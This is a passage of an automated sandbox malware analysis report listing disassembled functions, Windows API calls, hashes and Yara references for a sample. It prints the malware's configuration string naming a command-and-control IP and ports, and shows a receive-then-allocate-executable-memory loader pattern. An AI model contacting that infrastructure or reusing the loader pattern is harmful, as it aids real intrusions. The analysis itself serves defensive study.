                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexitrecvselect
                                                                                    • String ID:
                                                                                    • API String ID: 4248608111-0
                                                                                    • Opcode ID: dfde4c9adb0f997db322e9fa07fcdd159c17fc03b3bd51b30bc5f7244f5a73f1
                                                                                    • Instruction ID: 3720c996353063e6240282ad354b2a0e5cd05efce2d3d1f3f303266247c0e2b6
                                                                                    • Opcode Fuzzy Hash: dfde4c9adb0f997db322e9fa07fcdd159c17fc03b3bd51b30bc5f7244f5a73f1
                                                                                    • Instruction Fuzzy Hash: 4721B479D02308ABEB30EF69DC94BDA77A4EF44310F1845E5E5045F190D770A984CBE9
                                                                                    Function 03073260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • send.WS2_32(?,?,00040000,00000000), ref: 03073291
                                                                                    • send.WS2_32(?,?,?,00000000), ref: 030732CE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: send
                                                                                    • String ID:
                                                                                    • API String ID: 2809346765-0
                                                                                    • Opcode ID: e63ca6b0c43f1bd22bd9c7459bac59aec1ee0db9e8dc870929731db2fbede22b
                                                                                    • Instruction ID: 1e256672028033f50410ba4a0a6071e33ecd694d26bc58bcab535da82cf9ec6d
                                                                                    • Opcode Fuzzy Hash: e63ca6b0c43f1bd22bd9c7459bac59aec1ee0db9e8dc870929731db2fbede22b
                                                                                    • Instruction Fuzzy Hash: B511E57AF07304B7E760CA6ADC89B9EB7DDFB81264F1440A5E908D7280D2719942A698
                                                                                    Function 100135C0 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000022,00000040,1001304F,000000FF,?,1001304F,00000040,00000022,?), ref: 100135F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Fiopen@std@@U_iobuf@@
                                                                                    • String ID:
                                                                                    • API String ID: 2284775142-0
                                                                                    • Opcode ID: 4f9c097bd9ff1fc27bc4b621ca56d4494d79341367a5276cc761d7329a66d7a3
                                                                                    • Instruction ID: 655dba523039e8c1ca7b53558f86e7561812b5aaf6b8d3e237c0567069c37aa1
                                                                                    • Opcode Fuzzy Hash: 4f9c097bd9ff1fc27bc4b621ca56d4494d79341367a5276cc761d7329a66d7a3
                                                                                    • Instruction Fuzzy Hash: 08213AB5D04209EFCB04DF98CC81BAEB7B4FB48750F108628E526A7390D735AA50CBA0
                                                                                    Function 0040CBAC Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CBE8
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CC39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 1159719554-0
                                                                                    • Opcode ID: 4383079db15fcd8ef662a46fade05db089f3147d55ebe15ae5cef73a62b66191
                                                                                    • Instruction ID: c1507673094f8c5292584a269d2518184869565b67f53896f9c973a0a4d881f3
                                                                                    • Opcode Fuzzy Hash: 4383079db15fcd8ef662a46fade05db089f3147d55ebe15ae5cef73a62b66191
                                                                                    • Instruction Fuzzy Hash: 8411BF70A4420CABEB10EF60CD86BDD73B8DB04704F5041BAB408B32C1DA385F80CA99
                                                                                    Function 027130C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: SleepTimetime
                                                                                    • String ID:
                                                                                    • API String ID: 346578373-0
                                                                                    • Opcode ID: 17644261f8f2ea678b36258984e6219596e11905b4bf9f7dca3c67d7ff61212b
                                                                                    • Instruction ID: 07eccf90e14672777b8acf3800388b76fc21d853fab8b9c5368cdf2245c0fa63
                                                                                    • Opcode Fuzzy Hash: 17644261f8f2ea678b36258984e6219596e11905b4bf9f7dca3c67d7ff61212b
                                                                                    • Instruction Fuzzy Hash: 8F01D431600609EFD724CF29D8C8BADB7B5FF59305F244264E5009B280C771A9D5C7D1
                                                                                    Function 030730E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SleepTimetime
                                                                                    • String ID:
                                                                                    • API String ID: 346578373-0
                                                                                    • Opcode ID: 0346912d0a2d34d6aa8db5adb3c99e162bda0c620433e117039941e44d96bf2c
                                                                                    • Instruction ID: 6bfe12b804034c11092360436fd5248905540e1c3fe40756469286f918ad3853
                                                                                    • Opcode Fuzzy Hash: 0346912d0a2d34d6aa8db5adb3c99e162bda0c620433e117039941e44d96bf2c
                                                                                    • Instruction Fuzzy Hash: DD01DF39A0120ABFE315DF28C8C8BA9F7A9FB99301F1842A5D1048B680C735A9D6D7D5
                                                                                    Function 02716410 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,02715AF2), ref: 0271642B
                                                                                    • _free.LIBCMT ref: 02716466
                                                                                      • Part of subcall function 02711280: __CxxThrowException@8.LIBCMT ref: 02711290
                                                                                      • Part of subcall function 02711280: DeleteCriticalSection.KERNEL32(00000000,?,02727E78), ref: 027112A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                    • String ID:
                                                                                    • API String ID: 1116298128-0
                                                                                    • Opcode ID: d2bbf2aa721f114251104c6910637086deae85c933c4be868d38b06a03e86fbc
                                                                                    • Instruction ID: 9954b14dcdc31069d3e5eb2789a35be1032f91c0d929ffd2de948a12ef8778c2
                                                                                    • Opcode Fuzzy Hash: d2bbf2aa721f114251104c6910637086deae85c933c4be868d38b06a03e86fbc
                                                                                    • Instruction Fuzzy Hash: 66018CF1A00B408FC7319F6A9844A07FAF8FF98710B108A1ED6DAC7A10D374A149CF95
                                                                                    Function 0307CD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • HeapCreate.KERNEL32(00000004,00000000,00000000,0307E04E,00000000,03079800,?,?,?,00000000,0309125B,000000FF,?,0307E04E), ref: 0307CD1B
                                                                                    • _free.LIBCMT ref: 0307CD56
                                                                                      • Part of subcall function 03071280: __CxxThrowException@8.LIBCMT ref: 03071290
                                                                                      • Part of subcall function 03071280: DeleteCriticalSection.KERNEL32(00000000,0307D3E6,03096624,?,?,0307D3E6,?,?,?,?,03095A40,00000000), ref: 030712A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                    • String ID:
                                                                                    • API String ID: 1116298128-0
                                                                                    • Opcode ID: 4c53b61631f531b02aef240f0948d1144d9147213f88b6babf81145a111df3b3
                                                                                    • Instruction ID: 541ac0f29ade99a06c7807f6a7bbe64bc1c375e1f86dc2294b90d074dae7de09
                                                                                    • Opcode Fuzzy Hash: 4c53b61631f531b02aef240f0948d1144d9147213f88b6babf81145a111df3b3
                                                                                    • Instruction Fuzzy Hash: C2017AB0A02B449FD330DF6A9844A47FAE8BF98700B104A1ED2DACAA10D374A505CF55
                                                                                    Function 00428614 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 0042861E
                                                                                    • LoadLibraryW.KERNEL32(00000000,00000000,00428668,?,00000000,00428686,?,00008000), ref: 0042864D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                    • String ID:
                                                                                    • API String ID: 2987862817-0
                                                                                    • Opcode ID: 46fa6bf7c39c9205b4f2e33c71be27e1bd0f5d6462176cf82db7d2d05287f296
                                                                                    • Instruction ID: 872fb0b1150bba30eaf2acd4e0c3a99a1078ee24a947000b27c0355be161ab5f
                                                                                    • Opcode Fuzzy Hash: 46fa6bf7c39c9205b4f2e33c71be27e1bd0f5d6462176cf82db7d2d05287f296
                                                                                    • Instruction Fuzzy Hash: 81F02770A14744BFDB119F768C6286FBBECE70DB0079348BAF900E2A91EA3C4810C568
                                                                                    Function 0307E480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32 ref: 0307E49B
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03081168,?,?,?,?,?,?,03096298,0000000C,03081210,?), ref: 0307E4A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateObjectSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1891408510-0
                                                                                    • Opcode ID: 7a1919bda59554dd7c41b6dc9157994956e2cdaaf3467fbddabcfac3bc11e734
                                                                                    • Instruction ID: 8dd81496169c418f36b890f93a33490c68b384987cefbf33c9e58eb6a9700b45
                                                                                    • Opcode Fuzzy Hash: 7a1919bda59554dd7c41b6dc9157994956e2cdaaf3467fbddabcfac3bc11e734
                                                                                    • Instruction Fuzzy Hash: 13E012B084660DBFDB14EB58EC84E3673DCE714330B104667B920D6248D539D860C7A4
                                                                                    Function 02717175 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 02717181
                                                                                      • Part of subcall function 0271990F: __getptd_noexit.LIBCMT ref: 02719912
                                                                                      • Part of subcall function 0271990F: __amsg_exit.LIBCMT ref: 0271991F
                                                                                      • Part of subcall function 02717156: __getptd_noexit.LIBCMT ref: 0271715B
                                                                                      • Part of subcall function 02717156: __freeptd.LIBCMT ref: 02717165
                                                                                      • Part of subcall function 02717156: ExitThread.KERNEL32 ref: 0271716E
                                                                                    • __XcptFilter.LIBCMT ref: 027171A2
                                                                                      • Part of subcall function 02719C41: __getptd_noexit.LIBCMT ref: 02719C47
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                    • String ID:
                                                                                    • API String ID: 418257734-0
                                                                                    • Opcode ID: 4f9a4f44e2bda25c9b9b8cc9a8d41fd2eace26c8fe9e34d96c0ba833193d8b12
                                                                                    • Instruction ID: 77924cce29cc9be055ac4a5ca98a50e1b61d6e23b64a771458c19fb91120bc26
                                                                                    • Opcode Fuzzy Hash: 4f9a4f44e2bda25c9b9b8cc9a8d41fd2eace26c8fe9e34d96c0ba833193d8b12
                                                                                    • Instruction Fuzzy Hash: 4EE012B1A01604EFE70DFBB4C959E6D7B76EF45701F200048E2025B2B5CB75A941EF24
                                                                                    Function 0307F983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 0307F98F
                                                                                      • Part of subcall function 03083E5B: __getptd_noexit.LIBCMT ref: 03083E5E
                                                                                      • Part of subcall function 03083E5B: __amsg_exit.LIBCMT ref: 03083E6B
                                                                                      • Part of subcall function 0307F964: __getptd_noexit.LIBCMT ref: 0307F969
                                                                                      • Part of subcall function 0307F964: __freeptd.LIBCMT ref: 0307F973
                                                                                      • Part of subcall function 0307F964: ExitThread.KERNEL32 ref: 0307F97C
                                                                                    • __XcptFilter.LIBCMT ref: 0307F9B0
                                                                                      • Part of subcall function 0308418F: __getptd_noexit.LIBCMT ref: 03084195
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                    • String ID:
                                                                                    • API String ID: 418257734-0
                                                                                    • Opcode ID: 823e994e5f303c09bb66f931ea69dfa6aa028a01ab5270af8180a0a35c3df1a8
                                                                                    • Instruction ID: ca5b7758c1f647f1ff017c22e5d8b138feb43beee7f69a9df289cb6fce45e2cf
                                                                                    • Opcode Fuzzy Hash: 823e994e5f303c09bb66f931ea69dfa6aa028a01ab5270af8180a0a35c3df1a8
                                                                                    • Instruction Fuzzy Hash: 91E0C2B8902701EFEB08FBA0C804FBD3734EF84B01F200188E0416F2A0CB399800DB20
                                                                                    Function 03086403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 0308641B
                                                                                      • Part of subcall function 03088E5B: __mtinitlocknum.LIBCMT ref: 03088E71
                                                                                      • Part of subcall function 03088E5B: __amsg_exit.LIBCMT ref: 03088E7D
                                                                                      • Part of subcall function 03088E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03083F06,0000000D,03096340,00000008,03083FFF,00000000,?,030810F0,00000000,03096278,00000008,03081155,?), ref: 03088E85
                                                                                    • __tzset_nolock.LIBCMT ref: 0308642C
                                                                                      • Part of subcall function 03085D22: __lock.LIBCMT ref: 03085D44
                                                                                      • Part of subcall function 03085D22: ____lc_codepage_func.LIBCMT ref: 03085D8B
                                                                                      • Part of subcall function 03085D22: __getenv_helper_nolock.LIBCMT ref: 03085DAD
                                                                                      • Part of subcall function 03085D22: _free.LIBCMT ref: 03085DE4
                                                                                      • Part of subcall function 03085D22: _strlen.LIBCMT ref: 03085DEB
                                                                                      • Part of subcall function 03085D22: __malloc_crt.LIBCMT ref: 03085DF2
                                                                                      • Part of subcall function 03085D22: _strlen.LIBCMT ref: 03085E08
                                                                                      • Part of subcall function 03085D22: _strcpy_s.LIBCMT ref: 03085E16
                                                                                      • Part of subcall function 03085D22: __invoke_watson.LIBCMT ref: 03085E2B
                                                                                      • Part of subcall function 03085D22: _free.LIBCMT ref: 03085E3A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 1828324828-0
                                                                                    • Opcode ID: 99c161eb83082b00752dae50368d9cbf44e9acfcb0865e8d0421cfb2ca57b4ab
                                                                                    • Instruction ID: 5bc23b6c7dcf41ae3adcb4948c414e0683c0e9182947d7b19f839cec89b79f4e
                                                                                    • Opcode Fuzzy Hash: 99c161eb83082b00752dae50368d9cbf44e9acfcb0865e8d0421cfb2ca57b4ab
                                                                                    • Instruction Fuzzy Hash: 9EE0C238843F1CD7CA62FBE0B602B8CB2606BD4F35F90524AE2D019580DA320101C65A
                                                                                    Function 0271474C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(|p1:154.82.85.107|o1:15091|t1:1|p2:154.82.85.107|o2:15092|t2:1|p3:154.82.85.107|o3:15093|t3:1|dd:1|cl:1|fz:), ref: 02714755
                                                                                      • Part of subcall function 02713260: __wcsrev.LIBCMT ref: 02730655
                                                                                    Strings
                                                                                    • |p1:154.82.85.107|o1:15091|t1:1|p2:154.82.85.107|o2:15092|t2:1|p3:154.82.85.107|o3:15093|t3:1|dd:1|cl:1|fz:, xrefs: 02714750
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsrevlstrlen
                                                                                    • String ID: |p1:154.82.85.107|o1:15091|t1:1|p2:154.82.85.107|o2:15092|t2:1|p3:154.82.85.107|o3:15093|t3:1|dd:1|cl:1|fz:
                                                                                    • API String ID: 4062721203-3795792448
                                                                                    • Opcode ID: d6c033a673b827f6a7e421625018f1285881f820c0946cf6e5e66775bc11a966
                                                                                    • Instruction ID: 2875aa315f7dda29864fea3195058788f1eabd6bd939b139290c35ef41e64e11
                                                                                    • Opcode Fuzzy Hash: d6c033a673b827f6a7e421625018f1285881f820c0946cf6e5e66775bc11a966
                                                                                    • Instruction Fuzzy Hash: 20C08CB2288218CFF71232E89408B2D3334FB23B11F608421EA01C5442D5718C1487B2
                                                                                    Function 03076EBC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(80000001,03076E9A), ref: 03076EC9
                                                                                    • RegCloseKey.ADVAPI32(75BF73E0), ref: 03076ED2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 7f9a76991742b2af3ac3c04b3d94e7a48e776e7815799e7cf04d1aa95e3e8264
                                                                                    • Instruction ID: 6a1acad1f1a29fadbc880da9f2901e5f441fba8e87a601ea162396c6442f0ed0
                                                                                    • Opcode Fuzzy Hash: 7f9a76991742b2af3ac3c04b3d94e7a48e776e7815799e7cf04d1aa95e3e8264
                                                                                    • Instruction Fuzzy Hash: 7BC04C72D01028A7CA10E7A4ED4894977B86B8C110F1144C2A104A3118C634AD418F90
                                                                                    Function 10015679 Relevance: 2.5, APIs: 2, Instructions: 23memorynetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • recv.WS2_32(00000280,-0F743538,-0FFFC690,00000000), ref: 1001561B
                                                                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(008D9158,00020000), ref: 10015661
                                                                                    • VirtualAlloc.KERNEL32(00000000,0001C9DB,00003000,00000040), ref: 100156C7
                                                                                    • memcpy.VCRUNTIME140(?,008D9158,0001C9DB), ref: 100156E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtualmemcpyreallocrecv
                                                                                    • String ID:
                                                                                    • API String ID: 56598225-0
                                                                                    • Opcode ID: 597c2f7fad0ceaf05d2332f96e8811aaaee1c623b4efeab370f415f2064ae4c8
                                                                                    • Instruction ID: 7a1c98bb85b264afdee6a04eef0c8c301afcb8b3c560be997619920f4651cfe9
                                                                                    • Opcode Fuzzy Hash: 597c2f7fad0ceaf05d2332f96e8811aaaee1c623b4efeab370f415f2064ae4c8
